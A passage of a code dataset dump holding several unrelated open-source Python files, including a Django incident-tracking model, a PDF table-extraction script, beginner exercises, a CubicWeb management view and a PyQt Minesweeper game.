__unicode__(self):\n return self.title_en\n\n def get_time_length(self):\n \"\"\"\n This method returns the time range for a given Incident event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n time = self.times.aggregate(\n lowest=Min('time_from'), highest=Max('time_to'))\n string = ''\n\n if(len(time) > 0):\n if time[\"lowest\"] is not None and time[\"highest\"] is not None:\n duration = (time[\"highest\"] - time[\"lowest\"]).days\n date_duration = time[\"lowest\"].strftime('%Y/%m/%d') + '→'\\\n + time[\"highest\"].strftime('%Y/%m/%d')\n string = '{0}' +\\\n '({1} days)'\n string = string.format(date_duration, str(duration))\n return string\n\n def most_recent_update_by(self):\n \"\"\"\n Returns the id of the las user you created an update for\n the given Incident\n \"\"\"\n user_id = self.incident_comments.values('status__user')\\\n .order_by('-comment_created')\n return user_id\n\n def most_recent_status_incident(self):\n \"\"\"\n This method returns the most recent status for a given Incident event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n status = self.incident_comments.values(\n 'status__status_en').order_by('-comment_created')\n if len(status) > 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\ndef update_last_logout(sender, request, user, **kwargs):\n \"\"\"\n A signal receiver which updates the last_logout date for\n the user logging out.\n \"\"\"\n logout_timestamp = timezone.now()\n if 'lastRequest' in request.session:\n logout_timestamp = request.session['lastRequest']\n del request.session['lastRequest'] \n \n\n ul = UserLog( )\n ul.login = user.last_login\n ul.logout = logout_timestamp\n try:\n logged_time = logout_timestamp - user.last_login\n ul.total_seconds = logged_time.total_seconds()\n except:\n pass #avoid #20 error for now: TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType'\n ul.user = user\n ul.save()\n\nuser_logged_out.connect(update_last_logout)\n","repo_name":"equalitie/open-corroborator","sub_path":"corroborator_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":41707,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} 
+{"seq_id":"73716360805","text":"import os\nimport shutil\n\nROOT_DIR = '.awsm'\nKEYS_PATH = 'keys.yml'\nPROFILES_PATH = 'profiles.yml'\nHOOKS_PATH = 'hooks.yml'\n\nUSER_CFG_DIR = os.path.expanduser(os.path.join('~', ROOT_DIR))\nUSER_KEYS_CFG = os.path.join(USER_CFG_DIR, KEYS_PATH)\nUSER_PROFILES_DIR = os.path.join(USER_CFG_DIR, 'profiles')\nUSER_HOOKS_DIR = os.path.join(USER_CFG_DIR, 'hooks')\n\nPROJECT_CFG_DIR = os.path.join(os.getcwd(), ROOT_DIR)\nPROJECT_IDENTITY = os.path.join(PROJECT_CFG_DIR, 'identifier')\nPROJECT_TAGS = os.path.join(PROJECT_CFG_DIR, 'tags.yml')\nPROJECT_PROFILES_CFG = os.path.join(os.getcwd(), PROFILES_PATH)\nPROJECT_HOOKS_CFG = os.path.join(os.getcwd(), HOOKS_PATH)\n\n\n##\n## Run this when any of the above paths are imported\n##\ndef _init_awsm_user_config():\n # Skip initialization if the user directory has already been initialized\n if os.path.exists(USER_CFG_DIR):\n return\n\n base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n templates_root = os.path.join(base_dir, 'templates')\n\n # Make the root user directories, if necessary\n for d in (\n USER_CFG_DIR,\n USER_PROFILES_DIR,\n USER_HOOKS_DIR,\n ):\n os.makedirs(d, exist_ok=True)\n\n # Add the default config files\n for cfg, dest_dir in (\n (KEYS_PATH, None),\n (PROFILES_PATH, USER_PROFILES_DIR),\n (HOOKS_PATH, USER_HOOKS_DIR),\n ):\n dst = (\n os.path.join(USER_CFG_DIR, cfg)\n if dest_dir is None else\n os.path.join(dest_dir, 'main.yml')\n )\n\n if not os.path.exists(dst):\n src = os.path.join(templates_root, cfg)\n shutil.copyfile(src, dst)\n\n_init_awsm_user_config()\n","repo_name":"jeevb/awsm","sub_path":"awsm/storage/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2123398430","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport sys, os, pickle\nimport urllib.request\nimport pandas as pd\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\nfrom tabula import convert_into\nfrom bs4 import BeautifulSoup\n\ndef html_mark_index(file_path):\n global m\n page = urllib.request.urlopen(\"file://\" + file_path).read()\n soup = BeautifulSoup(page, \"lxml\")\n try:\n if soup.find_all(class_=\"me\")[-1].contents[0] in \"※○◎△★\":\n m = soup.find_all(class_=\"me\")\n elif soup.find_all(class_=\"m3\")[-1].contents[0] in \"※○◎△★\":\n m = soup.find_all(class_=\"m3\")\n except:\n print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n m = list(filter(lambda x : x.contents[0][0] in \"※○◎△★\", m))\n m = m[2:]\n return m\n\ndef crop_pdf(file_path,x,y):\n input_f = PdfFileReader(open(file_path,\"rb\"))\n output_f = PdfFileWriter()\n\n numPages = input_f.getNumPages()\n\n sx = 39.66\n sy = y\n output_path = file_path.replace(\".pdf\", \"_crp.pdf\")\n output_path = output_path.replace(\"split\", \"crop\")\n\n for i in range(numPages):\n page = input_f.getPage(i)\n print(page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y())\n tx = page.mediaBox.getUpperRight_x()\n ty = page.mediaBox.getUpperRight_y()\n\n top = ty - sy - 24\n left = sx + 371\n\n bottom = top - 159\n right = left + 305\n\n page.mediaBox.loweLeft = (left,bottom)\n page.mediaBox.upperRight = (right, top)\n page.trimBox.lowerLeft = (left, bottom)\n page.trimBox.upperRight = (right, top)\n page.cropBox.lowerLeft = (left, bottom)\n page.cropBox.upperRight = (right, top)\n output_f.addPage(page)\n\n outputStream = open(output_path, \"wb\")\n 
output_f.write(outputStream)\n outputStream.close()\n return output_path\n\ndef convert_table(file_path):\n output_path = file_path.replace(\".pdf\", \".csv\")\n output_path = output_path.replace(\"crop\", \"table\")\n convert_into(file_path, output_path, output_format='csv')\n# def html_record_index(file_path):\n# page = urllib.request.urlopen(\"file://\" + file_path).read()\n# soup = BeautifulSoup(page, \"lxml\")\n# r = soup.find(string=\"훈련자별 입상률(%)\")\n# for rr in r.find_parent(\"div\")[\"class\"]:\n# if 'h' in rr:\n# record_key = rr\n# else:\n# None\n# r = soup.find_all(class_=record_key)\n# return r\n # try:\n # if soup.find_all(class_=\"me\")[-1].contents[0] in \"※○◎△★\":\n # m = soup.find_all(class_=\"me\")\n # elif soup.find_all(class_=\"m3\")[-1].contents[0] in \"※○◎△★\":\n # m = soup.find_all(class_=\"m3\")\n # else:\n # m = soup.find_all(class_=\"m3\")\n # except:\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n # r = soup.find_all(class_=\"m15\")\n # for rr in r:\n # print(rr)\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print('Warning')\n sys.exit()\n src_folder = sys.argv[1]\n\n pd\n\n table_txt_path = src_folder +\"/table.txt\"\n\n with open(table_txt_path,\"rb\") as f:\n table_path = pickle.load(f)\n\n for tab in table_path:\n table_html_path =tab.replace(\".pdf\", \".html\").replace(\"split\", \"html\")\n print(html_mark_index(table_html_path))\n # html_record_index(table_html_path)\n # except:\n # print(\"something is wrong\")","repo_name":"azurahi/entrophy_lab","sub_path":"kmmh/kmmh_table.py","file_name":"kmmh_table.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1442632065","text":"name=input(\"Enter your name\")\nage=int(input(\"Enter your age\"))\nif(age<3):\n print(name.title()+\",you are free to go\")\nelif(age<=12):\n print(name.title()+\"ticket costs 10 dollars\")\nelif(age>12):\n print(name.title()+\"ticket costs 15 dollars\")\n \n \nprint(\"Enjoy the movie\") \ntop=\"\"\ntomato=False\nwhile(top!='q'):\n top=input(\"enter a topping\")\n if(top=='tomato'):\n continue\n else:\n print(top.title()+\"is added\") \n break\nactive=True\nwhile(active!=True):\n print(\"no\")\nelse: \n print(\"execute\") \nconfirmed=[]\nunconfirmed=['Harish','Selva','Gokul','Rahul','Rahul']\nnew=[]\nwhile(unconfirmed):\n c=unconfirmed.pop()\n confirmed.append(c)\n\nfor user in confirmed:\n\n print(user.title()+\"welcome\") \n\nwhile('Rahul'in confirmed):\n confirmed.remove('Rahul')\nconfirmed.sort(reverse=True)\nprint(confirmed) ","repo_name":"VarthanV/Basic-Python-Files","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74783697765","text":"from cubicweb import _\n\nfrom logilab.common.textutils import unormalize\nfrom logilab.mtconverter import xml_escape\n\nfrom cubicweb.view import StartupView\nfrom cubicweb.predicates import match_user_groups, is_instance\nfrom cubicweb.schema import display_name\nfrom cubicweb.web import httpcache\nfrom cubicweb.web.views import uicfg\n\nclass ManageView(StartupView):\n \"\"\":__regid__: *manage*\n\n The manage view, display some information about what's contained by your\n site and provides access to administration stuff such as user and groups\n management.\n\n Regarding the section displaying link to entity type, notice by default it\n won't display entity types which are 
related to another one using a\n mandatory (cardinality == 1) composite relation.\n\n You can still configure that behaviour manually using the\n `indexview_etype_section` as explained in :mod:`cubicweb.web.uicfg`.\n \"\"\"\n __regid__ = 'manage'\n title = _('manage')\n http_cache_manager = httpcache.EtagHTTPCacheManager\n add_etype_links = ()\n skip_startup_views = set( ('index', 'manage', 'schema', 'owl', \n 'systempropertiesform', 'propertiesform',\n 'loggedout', 'login',\n 'cw.users-and-groups-management', 'cw.groups-management', \n 'cw.users-management', 'cw.sources-management',\n 'siteinfo', 'info', 'registry', 'gc',\n 'tree') )\n\n def call(self, **kwargs):\n \"\"\"The default view representing the instance's management\"\"\"\n self._cw.add_css('cubicweb.manageview.css')\n self.w(u'<h1>%s</h1>' % self._cw.property_value('ui.site-title'))\n self.entities()\n self.manage_actions()\n self.startup_views()\n\n def manage_actions(self):\n allactions = self._cw.vreg['actions'].possible_actions(self._cw)\n if allactions.get('manage'):\n self.w(u'<div class=\"hr\">&#160;</div>')\n self.w(u'<h2>%s</h2>\\n' % self._cw._('Manage'))\n self.w(u'<ul class=\"manageActions\">')\n for action in allactions['manage']:\n self.w(u'<li><a href=\"%s\">%s</a></li>' % (\n action.url(), self._cw._(action.title)))\n self.w(u'</ul>')\n\n def startup_views(self):\n views = [v for v in self._cw.vreg['views'].possible_views(self._cw, None)\n if v.category == 'startupview'\n and v.__regid__ not in self.skip_startup_views]\n if not views:\n return\n self.w(u'<div class=\"hr\">&#160;</div>')\n self.w(u'<h2>%s</h2>\\n' % self._cw._('Startup views'))\n self.w(u'<ul class=\"startup\">')\n for v in sorted(views, key=lambda x: self._cw._(x.title)):\n self.w('<li><a href=\"%s\">%s</a></li>' % (\n xml_escape(v.url()), xml_escape(self._cw._(v.title).capitalize())))\n self.w(u'</ul>')\n\n def entities(self):\n schema = self._cw.vreg.schema\n eschemas = [eschema for eschema in schema.entities()\n if uicfg.indexview_etype_section.get(eschema) == 'application']\n if eschemas:\n self.w(u'<div class=\"hr\">&#160;</div>')\n self.w(u'<h2>%s</h2>\\n' % self._cw._('Browse by entity type'))\n self.w(u'<table class=\"startup\">')\n self.entity_types_table(eschemas)\n self.w(u'</table>')\n\n def entity_types_table(self, eschemas):\n infos = sorted(self.entity_types(eschemas),\n key=lambda t: unormalize(t[0]))\n q, r = divmod(len(infos), 2)\n if r:\n infos.append( (None, '&#160;', '&#160;') )\n infos = zip(infos[:q+r], infos[q+r:])\n for (_, etypelink, addlink), (_, etypelink2, addlink2) in infos:\n self.w(u'<tr>\\n')\n self.w(u'<td class=\"addcol\">%s</td><td>%s</td>\\n' % (addlink, etypelink))\n self.w(u'<td class=\"addcol\">%s</td><td>%s</td>\\n' % (addlink2, etypelink2))\n self.w(u'</tr>\\n')\n\n def entity_types(self, eschemas):\n \"\"\"return an iterator on formatted links to get a list of entities of\n each entity types\n \"\"\"\n req = self._cw\n for eschema in eschemas:\n if eschema.final or not eschema.may_have_permission('read', req):\n continue\n etype = eschema.type\n nb = req.execute('Any COUNT(X) WHERE X is %s' % etype)[0][0]\n if nb > 1:\n label = display_name(req, etype, 'plural')\n else:\n label = display_name(req, etype)\n url = self._cw.build_url(etype)\n etypelink = u'&#160;<a href=\"%s\">%s</a> (%d)' % (\n xml_escape(url), label, nb)\n if eschema.has_perm(req, 'add'):\n yield (label, etypelink, self.add_entity_link(etype))\n else:\n yield (label, etypelink, u'')\n\n def create_links(self):\n self.w(u'<ul class=\"createLink\">')\n for etype in self.add_etype_links:\n eschema = self._cw.vreg.schema.eschema(etype)\n if eschema.has_perm(self._cw, 'add'):\n url = self._cw.vreg[\"etypes\"].etype_class(etype).cw_create_url(self._cw)\n self.w(u'<li><a href=\"%s\">%s</a></li>' % (\n url, self._cw.__('New %s' % eschema).capitalize()))\n self.w(u'</ul>')\n\n def add_entity_link(self, etype):\n \"\"\"creates a [+] link for adding an entity\"\"\"\n url = self._cw.vreg[\"etypes\"].etype_class(etype).cw_create_url(self._cw)\n return u'[<a href=\"%s\" title=\"%s\">+</a>]' % (\n xml_escape(url), self._cw.__('New %s' % etype))\n\n\n\nclass IndexView(ManageView):\n \"\"\":__regid__: *index*\n\n The default index view, that you'll get when accessing your site's root url.\n It's by default identical to the\n :class:`~cubicweb.web.views.startup.ManageView`, but you'll usually want to\n customize this one.\n \"\"\"\n __regid__ = 'index'\n title = _('view_index')\n","repo_name":"gurneyalex/cubicweb","sub_path":"cubicweb/web/views/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38167684991","text":"from math import floor\n\ncurrent_record = float(input())\ndistance_meters = float(input())\ntime_per_meter = float(input())\n\ntime_lost = floor(distance_meters / 15) * 12.5\n\ntime = distance_meters * time_per_meter + time_lost\n\nif time < current_record:\n print(f\"Yes, he succeeded! The new world record is {time:.2f} seconds.\")\nelse:\n print(f\"No, he failed! He was {time - current_record:.2f} seconds slower.\")\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Basics January 2023/Conditional_Statements_Exercises/swimming.py","file_name":"swimming.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26163223830","text":"import math\n\nclass Line:\n def __init__(self, cord1, cord2):\n self.cord1 = {\n 'x': cord1[0],\n 'y': cord1[1]\n }\n self.cord2 = {\n 'x': cord2[0],\n 'y': cord2[1]\n }\n\n def distance(self):\n x = self.cord1['x'] - self.cord2['x']\n y = self.cord1['y'] - self.cord2['y']\n summary = (x * x) + (y * y)\n\n return abs(math.sqrt(summary))\n\n def slope(self):\n x = self.cord2['x'] - self.cord1['x']\n y = self.cord2['y'] - self.cord1['y']\n\n return abs(y/x)\n\n\ncord2 = (3, 2)\ncord1 = (8, 10)\n\nli = Line(cord1, cord2)\nprint(\"line distance: {}\".format(li.distance())) # 9.433981132056603\nprint(\"line slope: {}\".format(li.slope())) # 1.6\n\n\n#---------------------------------------------------------------------------\n\nclass Cylinder:\n\n pi = 3.14\n\n def __init__(self, height = 1, radius = 1):\n self.height = height\n self.radius = radius\n\n def volume(self):\n\n return self.radius ** 2 * self.pi * self.height\n\n def surface_area(self):\n\n return (self.pi * self.radius **2 );\n\nc = Cylinder(2, 3)\nprint(f\"Cylinder volume: {c.volume()}\")\nprint(f\"Cylinder surface_area: {c.surface_area()}\")\n","repo_name":"DTL625/udemy-course-code","sub_path":"Complete-Python-Bootcamp/CH8_OBJ/Obj-HomeWork.py","file_name":"Obj-HomeWork.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1558627643","text":"import os\nfrom django.contrib.gis.utils import LayerMapping \nfrom .models import counties, WordBorder\n\n\ncounties_mapping = {\n 'objectid': 'OBJECTID',\n 'area': 'AREA',\n 'perimeter': 'PERIMETER',\n 'county3_field': 'COUNTY3_',\n 'county3_id': 'COUNTY3_ID',\n 'county': 'COUNTY',\n 'shape_leng': 'Shape_Leng',\n 'shape_area': 'Shape_Area',\n 'geom': 'MULTIPOLYGON',\n}\n\nworld_shp = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'Data/counties', 'County.shp'),\n)\n\ndef 
run(verbose=True):\n lm = LayerMapping(\n counties, world_shp, counties_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)\n\nwordborder_mapping = {\n 'fips': 'FIPS',\n 'iso2': 'ISO2',\n 'iso3': 'ISO3',\n 'un': 'UN',\n 'name': 'NAME',\n 'area': 'AREA',\n 'pop2005': 'POP2005',\n 'region': 'REGION',\n 'subregion': 'SUBREGION',\n 'lon': 'LON',\n 'lat': 'LAT',\n 'geom': 'MULTIPOLYGON',\n}\n\nworld_shp2 = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'Data/world_borders', 'TM_WORLD_BORDERS-0.3.shp'),\n)\n\ndef run_border(verbose=True):\n lm = LayerMapping(\n WordBorder, world_shp2, wordborder_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)","repo_name":"MbuguaM/Datavi","sub_path":"lyser/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38070441490","text":"# -*- coding:utf-8 -*-\n\n\n\n# global_dict = {}\n\n# def student_thread(name):\n# \tstd = Student(name)\n# \tglobal_dict[threading.current_thread()] = std\n# \tdo_task_1()\n# \tdo_task_2()\n\n# def do_task_1():\n# \tstd = global_dict[threading.current_thread()]\n\n# def do_task_2():\n# \tstd = global_dict[threading.current_thread()]\n\n\n\n\n# def process_student(name):\n# \tstd = Student(name)\n# \t# std is a global variable, but every function needs to use it\n# \tdo_task_1(std)\n# \tdo_task_2(std)\n\n\n# def do_task_1(std):\n# \tdo_subtask_1(std)\n# \tdo_subtask_2(std)\n\n#---------------------------------------------------------\n# ThreadLocal\n\nimport threading\n\n# create a global ThreadLocal variable\nlocal_school = threading.local()\n\ndef process_student():\n\tstd = local_school.student\n\tprint('Hello,%s in (%s)' % (std,threading.current_thread().name))\n\ndef process_thread(name):\n\t# bind student to this thread's ThreadLocal\n\tlocal_school.student = name\n\tprocess_student()\n\n\nt1 = threading.Thread(target = process_thread,args = ('Alice',),name = 'Thread-A')\nt2 = threading.Thread(target = process_thread,args = ('Bob',),name = 'Thread-B')\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint('Threads ended')","repo_name":"lierfengmei/pyworks","sub_path":"myThreadLocal.py","file_name":"myThreadLocal.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21135148369","text":"#! /usr/bin/python3\n\n#\n# This program prints the barometric pressure and temperature as determined by\n# a TE Connectivity MS5611 barometric pressure sensor connected via I2C. 
It\n# also calculates the current altitude above sea level.\n#\n# All of the work for interfacing with the sensor and doing the related\n# calculations has been encapuslated in a seperate module, ms5611.py.\n#\n\nimport smbus\nimport ms5611\n\nbus = smbus.SMBus(1)\n\n\nsensor = ms5611.MS5611(bus)\n\n# Read the pressure and temperature values from the sensor\ndata = sensor.poll()\n\nprint(f\"Pressure: {data[0]} mbar\\nTemperature: {data[1]} ℃\")\n\n# Reuse data when calculating altitude so that we don't have to poll the\n# sensor twice\naltitude = sensor.get_altitude(pressure=data[0], temp=data[1])\n\nprint(f\"Altitude: {round(altitude, 2)} m above sea level\")\n\n\nbus.close()\n\n","repo_name":"samueldewan/SYSC3010_samuel_dewan","sub_path":"Lab-2/lab2-hardware-step3.py","file_name":"lab2-hardware-step3.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32834348511","text":"import math\nimport networkx as nx\nfrom queue import PriorityQueue as PQueue\n\nclass node(object) :\n\tdef __init__(self, index, parent, g, h):\n\t\tself.index = index\n\t\tself.parent = parent\n\t\tself.g = g\n\t\tself.h = h\n\n\tdef setParent(self, parent):\n\t\tself.parent = parent\n \n\tdef setG(self, g):\n\t\tself.g = g\n \n\tdef setH(self, h):\n\t\tself.h = h\n\ndef cal_dist(p1, p2, pos):\n\treturn math.sqrt((pos[p1][0] - pos[p2][0])**2 + (pos[p1][1]-pos[p2][1])**2)\n\n\ndef shortest_path(airports, start, goal, pos) :\n\topen_queue = PQueue()\n\topen_dict = {}\n\tclose_dict = {}\n\tstart_h = cal_dist(start, goal, pos)\n\tstart_node = node(start, None, 0, start_h)\n\topen_queue.put((start_node.h + start_node.g, start_node))\n\topen_dict[start] = start_node\n\n\twhile goal not in close_dict and not open_queue.empty():\n\t\tfind_path(airports, open_queue, open_dict, close_dict, goal, pos)\n\n\tpath = []\n\n\tif goal in close_dict:\n\t\tcurrent_node = close_dict[goal]\n\t\twhile current_node.parent != None:\n\t\t\tpath.append(current_node.index)\n\t\t\tcurrent_node = current_node.parent\n\t\tpath.append(start)\n\t\tpath = [path[len(path) - i -1] for i in range(len(path))]\n\treturn path\n\n\n\ndef find_path(airports, open_queue, open_dict, close_dict, goal, pos) :\n\tcurrent_node = open_queue.get()[1]\n\topen_dict.pop(current_node.index)\n\troads = list ( nx.neighbors(airports, current_node.index ) )\n\tupdate_node = False\n\tfor i in roads :\n\t\tif i not in close_dict :\n\t\t\tdistance = cal_dist(i, current_node.index, pos)\n\t\t\tnew_g = current_node.g + distance\n\t\t\tif i in open_dict :\n\t\t\t\tif new_g < open_dict[i].g :\n\t\t\t\t\topen_dict[i].parent = current_node\n\t\t\t\t\topen_dict[i].g = new_g\n\t\t\t\t\tupdate_node = True\n\n\t\t\telse :\n\t\t\t\tnew_h = cal_dist(i, goal, pos)\n\t\t\t\tnew_node = node(i, current_node, new_g, new_h)\n\t\t\t\topen_dict[i] = new_node\n\t\t\t\topen_queue.put((new_node.h + new_node.g, new_node))\n\n\tif update_node:\n\t\topen_queue = PQueue()\n\t\tfor v in open_dict.values():\n\t\t\topen_queue.put((v.h + v.g, v))\n\n\tclose_dict[current_node.index] = current_node\n\n","repo_name":"ryansxl/dynamic-path-planning","sub_path":"final/jingtai1.py","file_name":"jingtai1.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19074226300","text":"import pygame\r\nfrom PyQt6.QtWidgets import (\r\n QWidget, QMainWindow,\r\n QGridLayout, QVBoxLayout, QFormLayout,\r\n QLabel, 
QLCDNumber, QDialog,\r\n QPushButton, QSpinBox, QRadioButton, QCheckBox,\r\n QSpacerItem, QSizePolicy, QFrame\r\n)\r\nfrom PyQt6.QtCore import Qt, QSize\r\nfrom PyQt6.QtGui import QMouseEvent, QCloseEvent, QAction, QActionGroup, QIcon\r\nfrom tools import Difficulty\r\nimport configparser\r\nimport sys\r\n# Constants ------------------------------------------------------------------------------------------------------------\r\nconfig = configparser.ConfigParser()\r\nconfig.read('config.ini')\r\n\r\ncell_size = int(config['DEFAULT']['cell_size'])\r\npaddings = int(cell_size / 3)\r\npanel_size = int(cell_size * 1.5)\r\nLCD_width = int(cell_size * 2.5)\r\nB_size = int(cell_size * 1.3)\r\nw_max = int(config['DEFAULT']['w_max'])\r\nh_max = int(config['DEFAULT']['h_max'])\r\n\r\n# LCDCounter -----------------------------------------------------------------------------------------------------------\r\nclass LCDCounter(QLCDNumber):\r\n def __init__(self, count=0) -> None:\r\n super(LCDCounter, self).__init__()\r\n self.setMinimumSize(LCD_width, panel_size)\r\n self.setMaximumWidth(LCD_width)\r\n self.setDigitCount(3)\r\n self.__value__ = count\r\n self.displayLCD()\r\n def __add__(self, n: (int, float)) -> float:\r\n return self.__value__ + n\r\n def __sub__(self, n: (int, float)) -> float:\r\n return self.__value__ - n\r\n def __int__(self) -> int:\r\n return int(self.__value__)\r\n\r\n def clear(self) -> None:\r\n self.__value__ = 0\r\n self.displayLCD()\r\n def set(self, n: int) -> None:\r\n self.__value__ = n\r\n self.displayLCD()\r\n def displayLCD(self) -> None:\r\n if self.__value__ < 0:\r\n raise ValueError\r\n elif self.__value__ > 1000:\r\n self.display('999')\r\n else:\r\n self.display(str(int(self.__value__)).zfill(3))\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Dialog for entering custom difficulty settings -----------------------------------------------------------------------\r\nclass InputDifficulty(QDialog):\r\n def __init__(self, win, cur_diff: Difficulty):\r\n super(InputDifficulty, self).__init__()\r\n self.win = win\r\n\r\n self.setWindowTitle('Set Custom Difficulty')\r\n self.setModal(True)\r\n self.setFixedSize(300, 400)\r\n\r\n self.Layout = QVBoxLayout()\r\n for name in ['Easy start', 'Open accord', 'Set accord', 'Inform flag', 'NF mode']:\r\n check = QCheckBox()\r\n check.setText(name)\r\n if config['SETTINGS'][name.lower().replace(' ', '_')] == 'True': check.setCheckState(Qt.CheckState.Checked)\r\n self.Layout.addWidget(check)\r\n\r\n separator = QFrame()\r\n separator.setFrameShape(QFrame.Shape.HLine)\r\n separator.setFrameShadow(QFrame.Shadow.Sunken)\r\n self.Layout.addWidget(separator)\r\n\r\n for name in ['Easy', 'Normal', 'Hard', 'Custom']:\r\n option = QRadioButton()\r\n option.setText(name)\r\n self.Layout.addWidget(option)\r\n if name == 'Easy':\r\n option.setChecked(True)\r\n if name == 'Custom':\r\n self.form = QFormLayout()\r\n self.form.setSpacing(10)\r\n option.toggled.connect(self.switch_difficulty)\r\n for field in ['Height', 'Width', 'Mines']:\r\n spin = QSpinBox()\r\n spin.setEnabled(False)\r\n if field == 'Mines': spin.setMinimum(2)\r\n else: spin.setMinimum(8)\r\n spin.setMaximum(1000)\r\n spin.setPrefix(field + ': ')\r\n spin.valueChanged.connect(self.check_value)\r\n self.form.addWidget(spin)\r\n self.Layout.addLayout(self.form)\r\n self.setLayout(self.Layout)\r\n\r\n confirm_btn = QPushButton(\"Confirm\")\r\n confirm_btn.clicked.connect(self.confirm)\r\n 
self.Layout.addWidget(confirm_btn)\r\n\r\n def switch_difficulty(self):\r\n name = self.sender().text()\r\n for i in range(self.form.count()):\r\n self.form.itemAt(i).widget().setEnabled(False)\r\n if name == 'Custom':\r\n self.form.itemAt(i).widget().setEnabled(True)\r\n\r\n def check_value(self):\r\n name = self.sender().prefix()[:-4]\r\n value = self.sender().value()\r\n if name == 'Height' and value > h_max: value = h_max\r\n if name == 'Width' and value > w_max: value = w_max\r\n if name == 'Mines':\r\n w = self.sender().parent().form.itemAt(0).widget().value()\r\n h = self.sender().parent().form.itemAt(1).widget().value()\r\n if value > w * h - 9: value = w * h - 9\r\n self.sender().setValue(value)\r\n\r\n def confirm(self):\r\n difficulty = None\r\n for i in range(6, 10):\r\n if self.Layout.itemAt(i).widget().isChecked():\r\n name = self.Layout.itemAt(i).widget().text()\r\n if name != 'Custom':\r\n difficulty = name.lower()\r\n else:\r\n difficulty = []\r\n for j in range(self.form.count()):\r\n difficulty.append(str(self.form.itemAt(j).widget().value()))\r\n difficulty = ', '.join(difficulty)\r\n\r\n config.set('SETTINGS', 'difficulty', difficulty)\r\n for i in range(5):\r\n name = self.Layout.itemAt(i).widget().text().replace(' ', '_')\r\n if self.Layout.itemAt(i).widget().isChecked():\r\n config.set('SETTINGS', name, 'True')\r\n else:\r\n config.set('SETTINGS', name, 'False')\r\n\r\n with open('config.ini', 'w') as configfile:\r\n config.write(configfile)\r\n self.win.__difficulty__ = Difficulty(config['SETTINGS']['difficulty'])\r\n self.close()\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Restart button -------------------------------------------------------------------------------------------------------\r\nclass RestartButton(QPushButton):\r\n def __init__(self):\r\n super(RestartButton, self).__init__()\r\n self.setFixedSize(B_size, B_size)\r\n self.setCheckable(True)\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Minesweeper ----------------------------------------------------------------------------------------------------------\r\nclass MSWindow(QMainWindow):\r\n def __init__(self):\r\n self.__mouse_event__ = None\r\n self.__need_to_restart__ = False\r\n self.__game_state__ = -1\r\n self.__difficulty_input__ = InputDifficulty(self, Difficulty(config['SETTINGS']['difficulty']))\r\n self.__difficulty__ = Difficulty(config['SETTINGS']['difficulty'])\r\n self.parameters = {\r\n 'paddings': 0,\r\n 'MSCounter_width': 0,\r\n 'MSCounter_height': 0,\r\n 'MSRestart_Button_size': 0,\r\n 'offset': 0\r\n }\r\n self.__surface_width__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.columns\r\n self.__surface_height__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.rows\r\n super(MSWindow, self).__init__()\r\n self.setWindowIcon(QIcon('icons/icon.png'))\r\n\r\n self.menubar = self.menuBar()\r\n gameMenu = self.menubar.addMenu('Game')\r\n gameMenuActions = QActionGroup(self)\r\n for panel in ['Settings']:\r\n action = QAction('Settings', self)\r\n gameMenuActions.addAction(action)\r\n gameMenu.addAction(action)\r\n gameMenu.triggered.connect(lambda: self.__difficulty_input__.show())\r\n\r\n self.setFixedSize(self.__surface_width__ + paddings * 2,\r\n self.__surface_height__ + panel_size + paddings * 2 + self.menubar.height())\r\n windowWidget = QWidget()\r\n windowLayout = QVBoxLayout()\r\n 
